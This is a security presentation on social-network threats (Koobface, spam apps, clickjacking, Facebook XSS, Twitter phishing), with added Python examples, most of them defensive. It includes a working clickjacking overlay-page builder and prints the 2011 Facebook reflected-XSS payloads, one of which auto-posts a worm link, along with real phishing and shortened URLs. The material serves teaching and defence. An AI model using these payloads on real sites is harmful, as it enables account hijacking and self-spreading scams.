Security threats on social networks
Nithya Raman, Senior Security Analyst, Symantec
Facebook: 4th largest U.S. web property by audience size, with 157.2 million visitors
Linkedin.com: 33.4 million visitors
Twitter.com: 27.0 million visitors
All-time U.S. audience highs in May 2011 (data from comScore)
Rise of social networking
More than 750 million active users
50% of active users log on to Facebook in any given day
Average user has 130 friends
People spend over 700 billion minutes per month on Facebook
People on Facebook install 20 million applications every day
Data from Facebook
Facebook Statistics
Both Facebook and Twitter allow third-party applications
Spam applications are a common occurrence on these sites
Applications have also been used to spread adware, phishing links and other malware
Malicious applications on Facebook and Twitter
Automatically adds status messages and wall posts/tweets
Usually leads to "human verification" tests or surveys: you are tricked into believing that you must complete the survey in order to see the promised content
The scammers, meanwhile, earn a commission for every survey completed, and use your Facebook account to spread the links even further
Spam applications
Spam link        Number of clicks
bit.ly/e9zZvk    281,167
bit.ly/dSUqN6    85,833
bit.ly/fCTbAB    71,372
bit.ly/fQEUl9    21,267
Clicks data for spam apps
Similar to spam applications; usually spreads using wall posts/tweets and messages
Applications can redirect to
- fake codec/antivirus pages
- phishing pages
- other malware/exploits
Malware applications
First appeared in late 2008
Spreads across social networks like Facebook, MySpace and Twitter
Uses wall posts/tweets containing a link that usually leads to a page which looks like a YouTube video
Offers a fake Adobe Flash Player update, which is in fact the Koobface zombie executable
What is Koobface?
Spreads through social networks
Steals confidential information and software license keys
Redirects web browsing to malicious sites and injects advertising
Intercepts Internet traffic and blocks access to certain Internet sites
Downloads additional files/pay-per-install software
Breaks CAPTCHAs, determines if a link is blocked by
Creates new Blogspot accounts and pages
Modifies the Hosts file
Koobface behaviour
Wall posts/tweets
Direct messages
Koobface links are usually accompanied by enticing messages such as
Cool Video <malicious link>
LOL <malicious link>
Last Video <malicious link>
Spreading techniques
Malicious link type         Count    Share
Blogspot.com pages          15841    29.2%
'bit.ly' shortened links    37133    68.5%
Google links                  184     0.3%
Other links                  1035     1.9%
Koobface links
Total number of unique Koobface links: 54193
For the 37133 'bit.ly' links among them:
Total number of clicks: 3,671,541
Average number of clicks per link: 99
Maximum number of clicks per link: 12836
Number of links with over 10K clicks: 73
'bit.ly' link statistics
Multiple redirections
Shortened links: 69% of links collected were 'bit.ly' short links
Referrer URL check: if the Referer header is not set (the request did not come from a social-network click), the visitor is sent to a Google News page or another clean page instead of the malicious one
User-Agent check
Broken URLs: random text is added just before the valid URL, so that automated URL extraction does not pick the link up
Detection evasion techniques
User is lured with a bait message to a prepared site
User is asked to copy a JavaScript snippet into the browser address bar and press the 'Enter' key
Manual script scams
Updates your FB status with these spam messages and also posts on your friends' walls
Sends chat messages to friends
Adds "Likes" to different Facebook pages
Tags you in images
Creates an event and sends an invitation to all your friends
Facebook provides a personalized e-mail address, using which you can update your FB status; the script tries to gain access to this personalized address so the hacker can update your FB status at any time
http://www.facebook.com/mobile/?v=photos
Script behavior
The practice of deceptively directing a website visitor's clicks to an undesired element of another site
Attacker overlays multiple transparent or opaque layers to trick a user into clicking on a button or link on another page
Clicks meant for the original page are hijacked and routed to another page
What is clickjacking?
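The overlay trick described above, together with the check a defender runs against a page's response headers, as an added example (not code from the original deck). The target and framer origins are made up; the CSP host matching is deliberately simplified (no ports, no path, no scheme-only sources).

```python
"""Clickjacking: the transparent-overlay page and the headers that defeat it.

Added example, not from the original deck. Origins below are hypothetical.
"""
from urllib.parse import urlsplit


def overlay_page(target_url: str, bait_text: str = "Click to play") -> str:
    """Build the attacker page from the slide: a bait button with a fully
    transparent iframe of the target stacked on top, so the victim's click
    lands on whatever the framed page has under that spot."""
    return f"""<!doctype html>
<style>
  #bait  {{ position:absolute; top:120px; left:80px; z-index:1; }}
  #frame {{ position:absolute; top:0; left:0; width:800px; height:600px;
            opacity:0; z-index:2; border:0; }}   /* invisible, but on top */
</style>
<button id="bait">{bait_text}</button>
<iframe id="frame" src="{target_url}"></iframe>
"""


def _origin(url: str) -> str:
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def _host_matches(pattern: str, framer: str) -> bool:
    """Match one CSP host-source (optional scheme, optional leading '*.')
    against the framing page's origin. Simplified: ports/paths ignored."""
    fp = urlsplit(framer)
    if "://" in pattern:
        scheme, host = pattern.split("://", 1)
        if scheme.lower() != fp.scheme:
            return False
    else:
        host = pattern
    host = host.lower()
    if host.startswith("*."):
        return (fp.hostname or "").endswith(host[1:])  # "*.x.com" -> ".x.com"
    return fp.hostname == host


def framing_allowed(headers: dict, target_url: str, framer_url: str) -> bool:
    """Would a browser honouring CSP frame-ancestors / X-Frame-Options render
    target_url inside a page served from framer_url?

    frame-ancestors, when present, overrides X-Frame-Options; otherwise XFO
    applies; with neither header the page is framable, which is exactly the
    condition the overlay page above depends on."""
    h = {k.lower(): v for k, v in headers.items()}
    framer, target = _origin(framer_url), _origin(target_url)

    for directive in h.get("content-security-policy", "").split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.strip("'").lower() for s in parts[1:]]
            if not sources or "none" in sources:
                return False
            if "self" in sources and framer == target:
                return True
            return any(_host_matches(s, framer)
                       for s in sources if s not in ("self", "none"))

    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framer == target
    # ALLOW-FROM is ignored by current browsers and treated here as absent.
    return True
```

Run `framing_allowed` over the headers of every page that carries a state-changing button (Like, Share, Allow for an application): an empty result set of unprotected pages is the goal, and `overlay_page` is what a tester serves to confirm a finding.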
Cross-site scripting attacks are a type of injection problem, in which malicious scripts are injected into otherwise benign and trusted web sites
Facebook has been vulnerable to both persistent (stored) and non-persistent (reflected) XSS attacks
Cross-site scripting on Facebook
Vulnerability existed in the mobile API version of Facebook due to insufficient JavaScript filtering of the user_message_prompt parameter
hxxp://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=<script>alert(document.cookie);</script>
Non-persistent XSS – Facebook worm (March 2011)
The shortened tinyurl.com link redirects to the following URL (de-obfuscated):
hxxp://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang :D http://tinyurl.com/sampahh';document.forms[0].submit();}</script>
This URL automatically adds a wall post with the message 'jangan salahin w kalo lo bakal ngakak ngeliat ni orang :D hxxp://tinyurl.com/sampahh' (Indonesian: "don't blame me if you laugh out loud at this person :D"), so every victim who follows the link re-posts it to their own wall.
Non-persistent XSS – Facebook worm
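The reflection bug behind the worm, shown as an added example (not Facebook's code and not from the deck): a hypothetical stand-in for the prompt_feed.php template echoes the user_message_prompt parameter unescaped, beside the same template with HTML escaping. The worm payload is the de-obfuscated one from the slide; the template markup is invented.

```python
"""Reflected XSS, March 2011 Facebook worm shape: parameter echoed raw vs. escaped.

Added example. render_* are hypothetical stand-ins for the vulnerable endpoint.
"""
import html
from urllib.parse import urlsplit, unquote_plus

# Constructed URL carrying the worm's de-obfuscated payload: the injected script
# fills the first form's 'message' field and submits it as soon as the page loads.
WORM_URL = ("hxxp://m.facebook.com/connect/prompt_feed.php?display=wap"
            "&user_message_prompt=<script>window.onload=function(){"
            "document.forms[0].message.value='jangan salahin w kalo lo bakal "
            "ngakak ngeliat ni orang :D hxxp://tinyurl.com/sampahh';"
            "document.forms[0].submit();}</script>")


def prompt_from_url(url: str) -> str:
    """Extract user_message_prompt from a (possibly hxxp-defanged) URL.
    Split on '&' and only the first '=' so '=' inside the payload survives."""
    query = urlsplit(url.replace("hxxp://", "http://", 1)).query
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "user_message_prompt":
            return unquote_plus(value)
    return ""


def render_vulnerable(prompt: str) -> str:
    """Echoes the parameter into the page with no encoding: attacker markup
    becomes part of the page and runs with the victim's logged-in session."""
    return ("<form method=post action=/connect/prompt_feed.php>"
            f"<p>{prompt}</p>"
            "<textarea name=message></textarea><input type=submit></form>")


def render_hardened(prompt: str) -> str:
    """Same template with the parameter HTML-escaped; quote=True also covers
    the case where the value is reflected inside an attribute."""
    return ("<form method=post action=/connect/prompt_feed.php>"
            f"<p>{html.escape(prompt, quote=True)}</p>"
            "<textarea name=message></textarea><input type=submit></form>")


def has_live_script(page: str) -> bool:
    """Does the rendered page still contain an executable <script> tag?"""
    return "<script" in page.lower()
```

The point the worm makes is that "filtering" on the server is the wrong model: the fix is output encoding for the context the value lands in, not a blacklist of JavaScript fragments.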
Look for the latest news and events: Twitter trending topics
http://api.twitter.com/1/trends/current.json
Twitter trending topics poisoning
Mask the malicious URLs
URL-shortening services are commonly used on services like Twitter in order to conserve space
Various shortening services such as tinyurl.com, bit.ly and tiny.cc have been used to mask URLs
Twitter trending topics poisoning
Compose a collection of messages to tweet
Create messages with Twitter trending topics/hashtags planted randomly into the message
Start tweeting!
Tweets are sent from different fraudulent/compromised accounts
Twitter trending topics poisoning
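The three signals the procedure above leaves behind (several unrelated trending hashtags in one message, a shortened link, the same body posted from many accounts) scored on the analyst side, as an added example that is not from the deck or from Twitter. The trends, accounts, link and thresholds are constructed and arbitrary.

```python
"""Scoring tweets for trending-topic poisoning.

Added example, not from the original deck. All inputs are constructed.
"""
import re
from collections import defaultdict

SHORTENERS = {"bit.ly", "tinyurl.com", "tiny.cc", "t.co"}   # shorteners named on the slides
HASHTAG = re.compile(r"#(\w+)")
URL = re.compile(r"https?://([^/\s]+)")

# Constructed trends list and a small batch of tweets (three are one spam
# message with the hashtags reshuffled, posted from three accounts).
TRENDING = ["#royalwedding", "#oscars", "#playoffs", "#ff"]
TWEETS = [
    {"id": 1, "user": "acct_a", "text": "OMG #royalwedding #oscars leaked video http://bit.ly/abc123 #playoffs"},
    {"id": 2, "user": "acct_b", "text": "OMG #royalwedding #oscars leaked video http://bit.ly/abc123 #playoffs"},
    {"id": 3, "user": "acct_c", "text": "#playoffs OMG #royalwedding #oscars leaked video http://bit.ly/abc123"},
    {"id": 4, "user": "fan_22", "text": "Great game tonight #playoffs"},
    {"id": 5, "user": "news_x", "text": "Coverage of the #royalwedding starts at 9 http://news.example.com/live"},
]


def normalise(text: str) -> str:
    """Drop hashtags and links so reordered copies of one spam body compare equal."""
    t = HASHTAG.sub("", text)
    t = re.sub(r"https?://\S+", "", t)
    return " ".join(t.lower().split())


def score_batch(tweets, trending, dup_threshold=2, flag_at=4):
    """Return {tweet_id: (score, reasons)} for tweets that look like poisoning."""
    trend_set = {t.lstrip("#").lower() for t in trending}
    accounts_per_body = defaultdict(set)
    for tw in tweets:
        accounts_per_body[normalise(tw["text"])].add(tw["user"])

    flagged = {}
    for tw in tweets:
        score, reasons = 0, []
        tags = {m.lower() for m in HASHTAG.findall(tw["text"])}
        n_trend = len(tags & trend_set)
        if n_trend >= 2:                       # hashtags planted, not one topic
            score += n_trend
            reasons.append(f"{n_trend} trending hashtags")
        if {h.lower() for h in URL.findall(tw["text"])} & SHORTENERS:
            score += 2                         # destination masked
            reasons.append("shortened link")
        n_acc = len(accounts_per_body[normalise(tw["text"])])
        if n_acc >= dup_threshold:             # same body from several accounts
            score += n_acc
            reasons.append(f"same text from {n_acc} accounts")
        if score >= flag_at:
            flagged[tw["id"]] = (score, reasons)
    return flagged
```

Each signal alone is weak (a legitimate account may use a shortener and one hashtag); the combination is what separates the campaign from the genuine traffic around a trend.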
Spoofed websites designed to fool recipients into divulging their credentials
Again, these scams are usually accompanied by enticing messages
Wall posts, messages or tweets could contain
- direct links to the phishing site
- obfuscated shortened links
- links delivered via applications
Facebook and Twitter phishing scams
Link on the tweet      First redirection         Second redirection
http://t.co/QYQfGIa    http://kurz.es/8b3fcb     http://itwittiler.com/twitterlogin1
http://t.co/lAyDmRZ    http://i2h.de/b0tb        http://xxx-black-book.com/twitterlogin1/
http://t.co/9hk72A5    http://kurz.es/8b3fcb     http://itwittiler.com/twitterlogin1
http://t.co/PaFDmUJ    http://kurz.es/8b3fcb     http://itwittiler.com/twitterlogin1
Twitter phishing links
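How an analyst expands chains like the ones in the table, and at the same time catches the Referer and User-Agent cloaking from the detection evasion slide: an added example, not from the deck. The in-memory redirector is a constructed stand-in for a shortener-to-phishing chain; its rule (send anything that does not look like a real social-network click to a clean news page) is the behaviour the slide describes, and every hostname in it is made up.

```python
"""Expanding shortened links hop by hop and probing for cloaking.

Added example, not from the original deck. fake_redirector is constructed.
"""
from urllib.parse import urljoin

BOT_UA_HINTS = ("bot", "crawler", "spider", "curl", "python", "wget")
REDIRECT_CODES = (301, 302, 303, 307, 308)


def fake_redirector(url, headers):
    """Constructed server: url -> (status, Location). The middle hop applies the
    slide's checks: no social-network Referer or a scanner-like User-Agent
    gets a clean page (standing in for the Google News page), a real-looking
    click gets the phishing login."""
    ua = headers.get("User-Agent", "").lower()
    referer = headers.get("Referer", "")
    looks_like_click = (referer.startswith("http://twitter.example/")
                        and not any(h in ua for h in BOT_UA_HINTS))
    table = {
        "http://short.example/QYQ": (301, "http://hop.example/8b3fcb"),
        "http://hop.example/8b3fcb": (302, "http://phish.example/twitterlogin1"
                                      if looks_like_click else "http://news.example/clean"),
        "http://phish.example/twitterlogin1": (200, None),
        "http://news.example/clean": (200, None),
    }
    return table.get(url, (404, None))


def expand(url, fetch, headers, max_hops=10):
    """Follow Location headers one hop at a time (no automatic redirects, so
    every intermediate host is recorded). Returns (chain, final_status);
    stops on a non-redirect, a loop, or max_hops."""
    chain = [url]
    while len(chain) <= max_hops:
        status, location = fetch(chain[-1], headers)
        if status not in REDIRECT_CODES or not location:
            return chain, status
        nxt = urljoin(chain[-1], location)
        if nxt in chain:
            return chain + [nxt], "loop"
        chain.append(nxt)
    return chain, "max_hops"


PROFILES = {
    "bare":    {"User-Agent": "python-requests/2.x"},
    "browser": {"User-Agent": "Mozilla/5.0 (Windows NT 6.1) Firefox/4.0",
                "Referer": "http://twitter.example/"},
}


def probe_cloaking(url, fetch, profiles=PROFILES):
    """Expand the link under each header profile. Different final destinations
    mean the redirector cloaks: what a scanner sees is not what a victim sees."""
    finals = {name: expand(url, fetch, hdrs)[0][-1] for name, hdrs in profiles.items()}
    return finals, len(set(finals.values())) > 1
```

To run this against live links, replace `fake_redirector` with a function that issues one HEAD or GET per hop without following redirects and returns the status and Location header; the "browser" profile is the one that must carry a plausible Referer, or the chain will only ever show the decoy.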